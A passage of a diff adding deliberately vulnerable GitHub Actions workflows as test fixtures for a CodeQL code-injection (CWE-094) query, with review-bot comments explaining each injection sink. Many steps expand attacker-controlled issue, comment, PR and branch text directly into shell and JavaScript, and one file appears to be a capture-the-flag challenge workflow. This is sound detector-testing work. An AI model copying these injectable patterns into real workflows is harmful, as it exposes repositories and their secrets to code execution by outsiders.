>> $GITHUB_ENV + + # Remove sections in the issue body like "Dynamo version", "Stack Trace" because won't be used to predict the issue type + - name: Clean Issue Body + if: env.analysis_response == 'Valid' + env: + ISSUE_BODY_PARSED: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV + + # Create json string from the issue body + - name: Create Issue JSON String + if: env.analysis_response == 'Valid' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} + ISSUE_TITLE: ${{ github.event.issue.title }} + run: | + echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV + + # Checkout the IssuesTypePredicter repo (https://github.com/DynamoDS/IssuesTypePredicter) + - name: Checkout IssuesTypePredicter Repo + if: env.analysis_response == 'Valid' + uses: actions/checkout@v4 + with: + repository: DynamoDS/IssuesTypePredicter + path: IssuesTypePredicter + + # Setup dotnet + - name: Setup dotnet + uses: actions/setup-dotnet@v4 + with: + dotnet-version: '3.1.0' + + # Build the solution IssuesTypePredicter.sln (this contains two VS2019 ML.NET projects) + - name: Build Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + dotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release + cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . 
+ + # Execute the IssuesTypePredicter program and pass 'issue_json_string' as a parameter + - name: Run Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + echo "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV + + # If the is_wish_list variable contains 1, label the issue as "Wishlist" + - name: Label issue as 'Wishlist' + if: env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1') + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} + + # If the issue is missing important information (don't follow the template structure), label the issue as "NotMLEvaluated" + - name: Label issue as 'NotMLEvaluated' + if: env.analysis_response != 'Valid' || env.issue_json_string == '' + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml new file mode 100644 index 000000000000..ddb98c670c75 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml 
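Review bot: The three `echo "name="$(...)"" >> $GITHUB_ENV` lines (`Clean Issue Body`, `Create Issue JSON String`, `Run Issues Type Predicter`) close the double quotes before `$(`, so the command substitution is unquoted and subject to word splitting and glob expansion before being re-joined into the variable; the intended form is `echo "parsed_issue_body=$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1)" >> $GITHUB_ENV`, and likewise for the other two. In `Run Issues Type Predicter`, `"${{ env.issue_json_string }}"` is expanded into the script text even though the same value was just exported through `$GITHUB_ENV`, so `"$issue_json_string"` would pass the issue-derived JSON as a plain argument; as written, that expansion is the sink a reader has to identify (`"${{ env.template }}"` is a constant), so a comment on that line marking it as the expected alert would help. `dotnet run -p` is the deprecated spelling of `--project`.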
@@ -0,0 +1,68 @@ +# cherry-picking.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/disabled/cherry-picking.yaml#L45-L51) +#DYN-3364 +#This action is disabled for now due to it not behaving as expected +name: Cherry picking +on: + push: + branches: + - master +permissions: {} +jobs: + cherry_pick: + runs-on: ubuntu-latest + env: + #Variable for the name of the branch to cherry-pick into. + #It will remain 'invalid' if no branch is specified + destination_branch: 'invalid' + #Name of the autogenerated branch to create the PR from + auto_branch: 'auto-${{github.event.after}}' + #Username for the cherrypick + user_name: "Dynamo-Bot" + steps: + - name: checkout + uses: actions/checkout@v3 + + #Removes posible conflicting characters on the commit message + #This is because the content of the message will be passed to a script as a parameter and quotation marks will split the text as if it where multiple parameters. + - name: Remove conflicting chars + uses: frabert/replace-string-action@v1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{github.event.commits[0].message}} + replace-with: "-" + flags: g + + #Checks the message looking for a cherry-pick request and extracts the target branch name + - name: Check Information + env: + ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}} + id: check-info + run: | + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV + + #If a target branch was found will run the action + - if: env.destination_branch != 'invalid' + name: Create PR to branch + run: | + git config user.name "${{env.user_name}}" + git fetch --all + git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} + git cherry-pick -x ${{github.event.after}} --strategy-option theirs + git push -u origin ${{env.auto_branch}} + hub pull-request -b "${{env.destination_branch}}" -h 
"${{env.auto_branch}}" -m "${{env.pr_message}}" + env: + #Token used for the pull request. Corresponds to the DynamoBot account + GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} + ISSUE_BODY_PARSED: ${{steps.remove_quotations.outputs.replaced}} + #This represents the title and description of the pr in Markdown format + #Everything before the first blank line will be the title + #Everything after will be included in the description + pr_message: | + Cherry-Pick from commit: ${{github.event.after}} + + ### Cherry-picking: + [Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) + + ### Pull request: + ${{ env.ISSUE_BODY_PARSED }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml new file mode 100644 index 000000000000..fdb140ec3802 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -0,0 +1,8 @@ +on: discussion + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml new file mode 100644 index 000000000000..649d3a6e1319 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml @@ -0,0 +1,9 @@ +on: discussion_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' + - run: echo '${{ github.event.comment.body }}' \ No newline at end of file 
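Review bot: In `Create PR to branch`, `hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}"` expands `pr_message`, which embeds `ISSUE_BODY_PARSED` (the commit message with only `"` replaced), into the script text, and `Check Information` does the same with `"${{ env.ISSUE_BODY_PARSED }}"` although that step declares `ISSUE_BODY_PARSED` under `env:`. Because both values are step `env:` entries, `-m "$pr_message"` and `"$ISSUE_BODY_PARSED"` keep the commit-message text out of bash parsing; the header comment says the workflow is disabled, so if it is kept only as a CWE-094 fixture, a comment on those two lines naming them as the expected sinks would make that explicit. `destination_branch` is itself produced by the script from the message and then used unquoted in `git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}}`, so it is a second derived value flowing into the same shell.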
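Review bot: `echo '${{ github.event.discussion.title }}'` in both steps (and the three steps of discussion_comment.yml) single-quotes the expression, but the `${{ }}` substitution is textual and happens before bash sees the line, so a `'` in the title or body closes the quote and the remainder is parsed as shell; the single quotes are not a mitigation. These fixtures carry no markers, so applying the convention gollum.yml uses (`# safe` on the non-vulnerable line) in reverse, e.g. `# expected: injection via discussion.title`, would record that every step here is intended to be flagged.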
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml new file mode 100644 index 000000000000..b4c2ecaec700 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml 
@@ -0,0 +1,94 @@ +on: + workflow_call: + inputs: + botGithubId: + description: bot id + type: string + required: true + + secrets: + githubBotPAT: + description: The personal access token + required: true + +permissions: {} # all none + +jobs: + versions-check-result: + name: Publish Results + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion != 'skipped' + steps: + + - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + id: search-patch + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + run_id: context.payload.workflow_run.id, + ...context.repo + }) + let artifact = allArtifacts.data.artifacts.find(artifact => artifact.name == 'git-patch') + return artifact?.id + + - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + if: steps.search-patch.outputs.result + with: + ref: '${{ github.event.workflow_run.head_sha }}' + persist-credentials: false #Opt out from persisting the default Github-token authentication in order to enable use of the bot's PAT when pushing below + + - name: Download git patch + uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + id: fetch-patch + if: steps.search-patch.outputs.result + with: + script: | + let download = await github.rest.actions.downloadArtifact({ + artifact_id: ${{ steps.search-patch.outputs.result }}, + archive_format: 'zip', + ...context.repo + }) + let fs = require('fs') + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/patch.zip`, Buffer.from(download.data)) + await exec.exec('unzip', ['patch.zip']) + let pr_number = Number(fs.readFileSync('github_pull_request_number.txt')) + core.setOutput('pull_request_number', pr_number) + await io.rmRF('patch.zip') + await io.rmRF('github_pull_request_number.txt') + + - name: Apply and push version increment + id: git-commit + if: steps.search-patch.outputs.result + run: | + set -x + # Set initial placeholder name/mail and read it from the patch 
later + git config --global user.email 'foo@bar' + git config --global user.name 'Foo Bar' + + git am version_increments.patch + + # Read the author's name+mail from the just applied patch and recommit it with both set as committer + botMail=$(git log -1 --pretty=format:'%ae') + botName=$(git log -1 --pretty=format:'%an') + git config --global user.email "${botMail}" + git config --global user.name "${botName}" + git commit --amend --no-edit + + fileList=$(git diff-tree --no-commit-id --name-only HEAD -r) + echo "file-list<> $GITHUB_OUTPUT + echo "$fileList" >> $GITHUB_OUTPUT + echo "EOF" >> $GITHUB_OUTPUT + + git push \ + "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' + env: + BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} + + - name: Add or update information comment + uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + if: always() + with: + github-token: ${{ secrets.githubBotPAT }} + script: | + const fileList = `${{ steps.git-commit.outputs.file-list }}` diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml new file mode 100644 index 000000000000..0c4aa93c7a58 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml 
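Review bot: In `Apply and push version increment`, `git push "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'` expands the head branch name into the script; for a `workflow_run` triggered by a fork PR that name is chosen by the PR author, and the single quotes around the refspec do not help because the expansion precedes bash. The step already passes the token through `env:` (`BOT_PA_TOKEN`), so `HEAD_REPO` and `HEAD_BRANCH` entries there with `"${HEAD_REPO}"` and `"${HEAD_BRANCH}"` in the command keep the same shape. The same applies to the last step, where `` const fileList = `${{ steps.git-commit.outputs.file-list }}` `` places file names taken from the applied patch inside a JavaScript template literal, so a name containing `` ` `` or `${` ends the literal; supplying the output via `env:` and reading `process.env.FILE_LIST` avoids that. Since the job checks out `workflow_run.head_sha`, runs `git am version_increments.patch` on what is presumably the unzipped artifact, and pushes with the bot PAT, a comment on the `git am` line noting that the patch content and author come from the untrusted artifact would document the trust boundary.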
@@ -0,0 +1,95 @@ +name: changelog + +on: + workflow_call: + inputs: + taint: + description: taint + type: string + required: true + default: "" + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - run: echo "${{ inputs.taint }}" + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = 
content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml new file mode 100644 index 000000000000..a952c8c1ab85 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -0,0 +1,11 @@ +on: gollum + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pages[1].title }}' + - run: echo '${{ github.event.pages[11].title }}' + - run: echo '${{ github.event.pages[0].page_name }}' + - run: echo '${{ github.event.pages[2222].page_name }}' + - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml new file mode 100644 index 000000000000..c8a30dad2944 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml 
@@ -0,0 +1,37 @@
+name: Image URL Processing
+
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ process-image-url:
+ runs-on: ubuntu-latest
+ if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v2
+
+ - name: Extract and Clean Initial URL
+ id: extract-url
+ env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ echo "::set-output name=initial_url::$BODY"
+
+ - name: Get Redirected URL with Debugging
+ id: curl
+ env:
+ INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }}
+ run: |
+ echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT
+ - name: Trim URL after PNG
+ id: trim-url
+ env:
+ REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }}
+ run: |
+ echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT"
+
+ - name: Update Comment with New URL
+ run: |
+ NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}"
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml
new file mode 100644
index 000000000000..1ad46b0f6eb1
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml
@@ -0,0 +1,43 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml new file mode 100644 index 000000000000..4f149a920419 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml @@ -0,0 +1,43 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: [job0, job1] + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml new file mode 100644 index 000000000000..21fa789d9e7d --- /dev/null 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -0,0 +1,45 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job0 + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml new file mode 100644 index 000000000000..b964bb78dac3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -0,0 +1,44 @@ +on: push + +jobs: + job0: + runs-on: ubuntu-latest + outputs: + job_output: foo + steps: + - run: echo "foo" + + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step.outputs.value }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: + - job1 + + steps: + - id: sink + run: echo ${{needs.job1.outputs.job_output}} 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml
new file mode 100644
index 000000000000..d6b7b2b1b0c5
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml
@@ -0,0 +1,45 @@
+jn: push
+
+jobs:
+ job0:
+ runs-on: ubuntu-latest
+ outputs:
+ job_output: foo
+ steps:
+ - run: echo "foo"
+
+ job1:
+ runs-on: ubuntu-latest
+
+ outputs:
+ job_output: ${{ steps.step.outputs.value }}
+
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ fetch-depth: 0
+
+ - name: Get changed files
+ id: source
+ uses: tj-actions/changed-files@v40
+
+ - name: Remove foo from changed files
+ id: step
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ steps.source.outputs.all_changed_files }}
+ find: 'foo'
+ replace: ''
+
+ job2:
+ runs-on: ubuntu-latest
+
+ if: ${{ always() }}
+
+ needs:
+ - job0
+
+ steps:
+ - id: sink
+ # Should not be reported since job1 is not needed
+ run: echo ${{needs.job1.outputs.job_output}}
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
new file mode 100644
index 000000000000..5e767ce0239f
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml
@@ -0,0 +1,20 @@
+on: issues
+
+env:
+ global_env: ${{ github.event.issue.title }}
+ test: test
+
+jobs:
+ echo-chamber:
+ env:
+ job_env: ${{ github.event.issue.title }}
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo '${{ github.event.issue.title }}'
+ - run: echo '${{ github.event.issue.body }}'
+ - run: echo '${{ env.global_env }}'
+ - run: echo '${{ env.test }}'
+ - run: echo '${{ env.job_env }}'
+ - run: echo '${{ env.step_env }}'
+ env:
+ step_env: ${{ github.event.issue.title }}
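Review bot: The first line of inter-job5.yml is `jn: push`, which reads as a typo for `on: push`; without an `on:` key the workflow has no trigger, while the rest of the file is a copy of inter-job0.yml through inter-job4.yml with only the `needs` list changed. If a trigger-less workflow is the intended case, a comment next to that line saying so would stop the next reader from "fixing" it; otherwise `on: push` keeps the fixture parallel to its siblings. The existing `# Should not be reported since job1 is not needed` comment explains the `needs` edge, not the trigger line.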
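Review bot: issues.yaml is the only fixture in this directory with a `.yaml` extension; every other workflow added here uses `.yml`. If the spelling is deliberate, to check that both extensions are extracted, a leading comment such as `# .yaml extension on purpose: both .yml and .yaml workflows must be extracted` would record that; otherwise renaming it to `.yml` keeps the directory uniform.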
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml new file mode 100644 index 000000000000..b17a1fecbeb4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml 
@@ -0,0 +1,59 @@ +name: Issue Comment Created + +on: + issue_comment: + types: + - created + +jobs: + jira: + runs-on: ubuntu-latest + if: ${{ github.event.comment.body == '/jira ticket' }} + steps: + - run: echo ${{ github.event.comment.body }} + + - name: Login + uses: atlassian/gajira-login@v3 + env: + JIRA_BASE_URL: ${{ secrets.JIRA_BASE_URL }} + JIRA_USER_EMAIL: ${{ secrets.JIRA_USER_EMAIL }} + JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} + + - name: SearchParam + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Search + id: search + uses: tomhjp/gh-action-jira-search@v0.2.1 + with: + jql: 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Log + run: echo "Found issue ${{ steps.search.outputs.issue }}" + + - name: Create + id: create + if: steps.search.outputs.issue == '' + uses: atlassian/gajira-create@v3 + with: + project: ${{ secrets.JIRA_PROJECT }} + issuetype: Task + summary: '${{ github.event.repository.name }}: ${{ github.event.issue.title }}' + description: | + *Issue Link:* ${{ github.event.issue.html_url }} + + ${{ github.event.issue.body }} + fields: '{"customfield_10006": ${{ toJSON(secrets.JIRA_EPIC_TICKET) }}, "customfield_17401":{"value":${{ toJSON( secrets.JIRA_LAYER_CAKE )}}}}' + + - name: Add Comment + if: steps.search.outputs.issue == '' && steps.create.outputs.issue != '' + uses: actions/github-script@v6 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: '👋 Thanks, Jira [${{steps.create.outputs.issue}}] ticket created.' + }) diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml new file mode 100644 index 000000000000..ad9187a3d6bf --- /dev/null 
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml 
@@ -0,0 +1,135 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. 
Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml new file mode 100644 index 000000000000..826051dfc5ac --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml 
@@ -0,0 +1,37 @@
+name: Poutine Level 1
+on:
+ workflow_run:
+ workflows: ["Poutine Level 0"]
+ types:
+ - completed
+
+permissions: {}
+
+concurrency:
+ group: ${{ github.workflow }}
+ cancel-in-progress: false
+
+jobs:
